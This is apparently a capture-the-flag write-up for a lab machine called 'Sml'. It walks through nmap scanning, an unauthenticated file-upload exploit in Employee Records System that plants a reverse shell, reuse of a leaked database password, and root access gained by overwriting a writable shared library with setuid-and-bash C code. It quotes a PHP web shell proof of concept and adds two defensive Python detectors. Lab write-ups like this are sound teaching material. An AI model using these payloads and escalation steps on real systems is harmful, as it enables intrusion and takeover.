Sml

Target machine notes

QQ group: 660930334

I. Host discovery

┌──(root㉿kali)-[/miao/maze-sec/sml]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-10 15:36 CST
Nmap scan report for 192.168.2.1
Host is up (0.00044s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00027s latency).
MAC Address: 08:00:27:DB:21:14 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.52
Host is up (0.00096s latency).
MAC Address: 08:00:27:96:5F:B8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.04 seconds

Target IP: 192.168.2.52

II. Port scanning

1. Full TCP port scan

┌──(root㉿kali)-[/miao/maze-sec/sml]
└─# nmap --min-rate 10000 -p- 192.168.2.52
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-10 17:13 CST
Nmap scan report for 192.168.2.52
Host is up (0.00058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:96:5F:B8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 39.98 seconds

Open ports: 22, 80

2. Service and version scan

┌──(root㉿kali)-[/miao/maze-sec/sml]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.52
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-10 17:13 CST
Nmap scan report for 192.168.2.52
Host is up (0.00049s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Hello everyone!
MAC Address: 08:00:27:96:5F:B8 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.51 seconds

3. UDP port scan

┌──(root㉿kali)-[/miao/maze-sec/sml]
└─# nmap -sU --top-ports 100 192.168.2.52
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-10 17:11 CST
Nmap scan report for 192.168.2.52
Host is up (0.00090s latency).
All 100 scanned ports on 192.168.2.52 are in ignored states.
Not shown: 57 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response)
MAC Address: 08:00:27:96:5F:B8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 53.81 seconds

No open UDP ports were identified.

III. Web exploitation

Browsing to port 80 shows a login page.

1. employee_records_system CVE

Viewing the page source reveals that the application is employee_records_system (an HTML comment links to its download archive).

┌──(root㉿kali)-[/miao/maze-sec/sml]
└─# curl http://192.168.2.52
<!doctype html>
<html class="no-js" lang="">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<title>Hello everyone!</title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" type="text/css" href="css/jquery-ui.css" />
<link rel="stylesheet" type="text/css" href="css/style.css" />
<link href="css/font-awesome.min.css" type="text/css" rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=Roboto+Condensed" rel="stylesheet">
<script type="text/javascript" src="js/jquery.min.js"></script>
<script type="text/javascript" src="js/jquery-ui.min.js"></script>
</head>
<body id="loginPage">
<div class="login_wrapper clearfix">
<div class="LogResponse"></div>
<div class="login_wrapper_inner">
<!-- https://www.sourcecodester.com/sites/default/files/download/oretnom23/employee_records_system.zip -->
<form id="loginForm" class="clearfix" method="post" action="">
<div class="input-box">
<input type="text" class="inputField username" name="username" placeholder="username">
<div class="error usernameerror"></div>
</div>
<div class="input-box">
<input type="password" class="inputField password" name="password" placeholder="password">
<div class="error passworderror"></div>
</div>

<div class="input-box">
<button type="submit" class="submitField sign_in"><span class="sign-icon"><i class="fa fa-lock"></i></span> Sign in</button>
</div>
</form>
</div>
</div>
<div class="body_overlay"></div>

<script type="text/javascript" src="./js/global.js"></script>
</body>
</html>

Searching for known vulnerabilities in employee_records_system turns up an unauthenticated file upload vulnerability.

Uploading a reverse shell file returns the stored filename UnIhBA3TZQwDVPf_rev.php.

┌──(root㉿kali)-[/miao/maze-sec/sml]
└─# curl http://192.168.2.52/dashboard/uploadID.php -X POST -F 'employee_ID=@rev.php;filename=rev.php'
{"upload_filename":"UnIhBA3TZQwDVPf_rev.php","selected_filename":"rev.php"}
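Added example, not from the writeup: a detector for this upload-then-execute pattern run over constructed Apache access-log lines. It assumes the default combined log format; the endpoint and upload directory are the ones shown above, the log lines are made up.

```python
import re

# Endpoint and upload directory are the ones the writeup and the advisory show.
UPLOAD_ENDPOINT = "/dashboard/uploadID.php"
UPLOAD_DIR = "/uploads/employees_ids/"

# Apache combined log format: client ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# Constructed log lines (not captured from the target); the filename mirrors the
# <random prefix>_<original name> scheme seen in the upload response.
SAMPLE_LOG = """\
192.168.2.4 - - [10/Jul/2025:17:20:01 +0800] "GET / HTTP/1.1" 200 1463
192.168.2.4 - - [10/Jul/2025:17:21:10 +0800] "POST /dashboard/uploadID.php HTTP/1.1" 200 77
192.168.2.4 - - [10/Jul/2025:17:21:15 +0800] "GET /uploads/employees_ids/UnIhBA3TZQwDVPf_rev.php HTTP/1.1" 200 0
192.168.2.9 - - [10/Jul/2025:17:25:00 +0800] "GET /uploads/employees_ids/aB3dE5fG7hI9jK1_id.png HTTP/1.1" 200 8812
192.168.2.9 - - [10/Jul/2025:17:26:00 +0800] "GET /uploads/employees_ids/x.PHP?cmd=id HTTP/1.1" 404 196
"""

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_upload_abuse(log_text):
    """Return alerts as (ip, path, reason). Any request for a .php file under the
    ID-image directory is wrong on its own; one from a client that earlier POSTed
    to the upload endpoint is the full upload-then-execute chain."""
    uploaders, alerts = set(), []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # drop query string before matching
        if rec["method"] == "POST" and path == UPLOAD_ENDPOINT:
            uploaders.add(rec["ip"])
        elif path.startswith(UPLOAD_DIR) and path.lower().endswith(".php"):
            reason = "upload-then-execute" if rec["ip"] in uploaders else "php-in-upload-dir"
            alerts.append((rec["ip"], path, reason))
    return alerts
```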

IV. Obtaining www-data access

┌──(root㉿kali)-[/miao/maze-sec/sml]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.52] 55854
/usr/bin/script -qc /bin/bash /dev/null
www-data@sML:/var/www/html/uploads/employees_ids$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

USER FLAG

www-data@sML:/home/yulian$ cat user.txt 
flag{user-fde7951c3a57bc71b03631a9673ab67e}

V. Privilege escalation

1. Obtaining user access

The database username and password are found in the application's db_connect.php; use them to connect.

www-data@sML:/var/www/html/inc$ cat db_connect.php 
<?php
$mysql_hostname = "localhost";
$mysql_user = "root";
$mysql_password = "root";
$mysql_database = "sharp_db";

$db_connect = mysqli_connect($mysql_hostname, $mysql_user,$mysql_password, $mysql_database) or ("Could not connect database");
?>
www-data@sML:/var/www/html/inc$ mysql -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 15
Server version: 10.5.23-MariaDB-0+deb11u1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> select * from users;
+---------+-----------+----------+----------+----------------------------------+-------------+
| user_id | firstname | lastname | username | password | accounttype |
+---------+-----------+----------+----------+----------------------------------+-------------+
| 1 | Maxwell | Morrison | xxx2xy | 10a55271c201e41913764ff95b33248b | Admin |
| 3 | Maxwell | Morrison | admins | 02adcdf2171dc7e5757cdd7c0b91fa03 | Admin |
| 2 | Maxwell | Morrison | yulian | fde7951c3a57bc71b03631a9673ab67e | Admin |
+---------+-----------+----------+----------+----------------------------------+-------------+
3 rows in set (0.000 sec)

The users table gives yulian's password as fde7951c3a57bc71b03631a9673ab67e; use it to log in over SSH.

┌──(root㉿kali)-[/miao/maze-sec/sml]
└─# ssh yulian@192.168.2.52
yulian@192.168.2.52's password:
Linux sML 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
yulian@sML:~$ id
uid=1000(yulian) gid=1000(yulian) groups=1000(yulian)

2. Rebuilding the shared library

In yulian's home directory there is a file named get_root; running it prints hello world.

www-data@sML:/home/yulian$ ./get_root
Starting get_root program...
hello world

Checking which libraries the binary loads shows that it links against /usr/lib/sML/libxxoo.so.

yulian@sML:~$ ldd get_root 
linux-vdso.so.1 (0x00007ffd20857000)
libxxoo.so => /usr/lib/sML/libxxoo.so (0x00007fe9c25be000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe9c23e1000)
/lib64/ld-linux-x86-64.so.2 (0x00007fe9c25ca000)

Inspecting the library (the strings output shows an exported function named hello and the source file name xxoo.c):

yulian@sML:~$ strings /usr/lib/sML/libxxoo.so
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
__cxa_finalize
hello
puts
libc.so.6
GLIBC_2.2.5
u/UH
hello world
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
xxoo.c
__FRAME_END__
_fini
__dso_handle
_DYNAMIC
__GNU_EH_FRAME_HDR
__TMC_END__
_GLOBAL_OFFSET_TABLE_
_init
_ITM_deregisterTMCloneTable
puts@GLIBC_2.2.5
hello
__gmon_start__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

Write a replacement library that exports the same hello function and overwrite /usr/lib/sML/libxxoo.so with it. The writeup does not show the file permissions, but this step can only work because the library file is writable by yulian and get_root runs with root privileges; the resulting shell keeping yulian's supplementary group is consistent with get_root being a set-uid root binary.

yulian@sML:~$ vi xxoo.c
yulian@sML:~$ cat xxoo.c
#include<stdlib.h>
#include<stdio.h>
#include<unistd.h>



void hello(){
setuid(0);
setgid(0);
system("/bin/bash -p");
}

Compile xxoo.c as a shared object:

yulian@sML:~$ gcc -shared -fPIC -o malicious.so xxoo.c

Write the compiled file over /usr/lib/sML/libxxoo.so:

yulian@sML:~$ cat malicious.so > /usr/lib/sML/libxxoo.so
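Added example, not from the writeup: an audit that parses ldd output and reports libraries a non-root user could replace, which is the precondition the libxxoo.so substitution above depends on. Parsing is kept separate from the permission check so the check can run on a constructed case; the ldd text in demo() is made up to match the format shown above.

```python
import os
import re
import stat
import subprocess
import tempfile

# Resolved library paths in ldd(1) output follow "=>"; the vdso line has none.
LDD_RE = re.compile(r"=>\s+(/\S+)")

def parse_ldd(ldd_output):
    return [m.group(1) for m in map(LDD_RE.search, ldd_output.splitlines()) if m]

def lib_risk(path):
    """Return why a non-root user could replace this library, or None if it looks safe."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return "missing"
    if st.st_uid != 0:
        return "owned by uid %d, not root" % st.st_uid
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "group/world writable (mode %o)" % stat.S_IMODE(st.st_mode)
    parent = os.path.dirname(path)
    pst = os.stat(parent)
    if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
        return "directory %s is world-writable, file can be swapped" % parent
    return None

def audit_libs(ldd_output):
    """Map each risky library path to its reason; an empty dict means nothing found."""
    return {p: r for p in parse_ldd(ldd_output) if (r := lib_risk(p))}

def audit_binary(binary):
    # ldd may run the target's loader code; point this only at binaries you trust.
    out = subprocess.run(["ldd", binary], capture_output=True, text=True, check=True).stdout
    return audit_libs(out)

def demo():
    """Constructed case: a world-writable fake libxxoo.so plus a library that does not exist."""
    d = tempfile.mkdtemp()
    fake = os.path.join(d, "libxxoo.so")
    open(fake, "w").close()
    os.chmod(fake, 0o666)
    ldd_text = ("\tlinux-vdso.so.1 (0x00007ffd20857000)\n"
                "\tlibxxoo.so => %s (0x00007fe9c25be000)\n"
                "\tlibnothere.so => /nonexistent/libnothere.so (0x0)\n" % fake)
    return audit_libs(ldd_text)
```

Run audit_binary("/path/to/suid-binary") on a real system to get the same report for an actual executable.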

3. Obtaining root

Now simply run get_root again:

yulian@sML:~$ ./get_root
Starting get_root program...
root@sML:~# id
uid=0(root) gid=0(root) groups=0(root),1000(yulian)

ROOT FLAG

root@sML:/root# cat root.txt 
flag{root-4c850c5b3b2756e67a91bad8e046ddac}

Summary

1. employee_records_system vulnerability

https://www.exploit-db.com/exploits/49596

# Exploit Title: Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated)
# Date: 2021-02-25
# Exploit Author: sml@lacashita.com
# Vendor Homepage: https://www.sourcecodester.com/php/11393/employee-records-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employee_records_system.zip
# Version: v1.0
# Tested on: Ubuntu 20.04.2

uploadID.php can be used to upload .php files to
'/uploads/employees_ids/' without authentication.

POC
---

1) Make the following Request changing the "Host:" to your Victim IP.

POST /dashboard/uploadID.php HTTP/1.1
Host: 192.168.1.117
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------5825462663702204104870787337
Content-Length: 267
DNT: 1
Connection: close

-----------------------------5825462663702204104870787337
Content-Disposition: form-data; name="employee_ID"; filename="cmd2.php"
Content-Type: image/png
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
-----------------------------5825462663702204104870787337--


2) You will get the response with the name of the uploaded file
(upload_filename).

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 25 Feb 2021 19:17:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77
{"upload_filename":"Ag1rzKFWTlnCZhL_cmd2.php","selected_filename":"cmd2.php"}

3) Your file will be located in:
http://VICTIM_IP/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php

4) In this example, to run commands:
http://192.168.1.117/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php?cmd=whoami

Or use curl:

curl http://192.168.2.52/dashboard/uploadID.php -X POST -F 'employee_ID=@rev.php;filename=rev.php' 

2. Privilege escalation by rewriting a shared library

List the shared libraries a binary links against:

ldd <binary>

Compile the replacement as a shared object:

gcc -shared -fPIC -o <output_library.so> <source_file.c>

Sml
http://miao-sec.github.io/Maze-sec/Sml/
Author: Miao
Published: July 13, 2025
License: BY-MIAO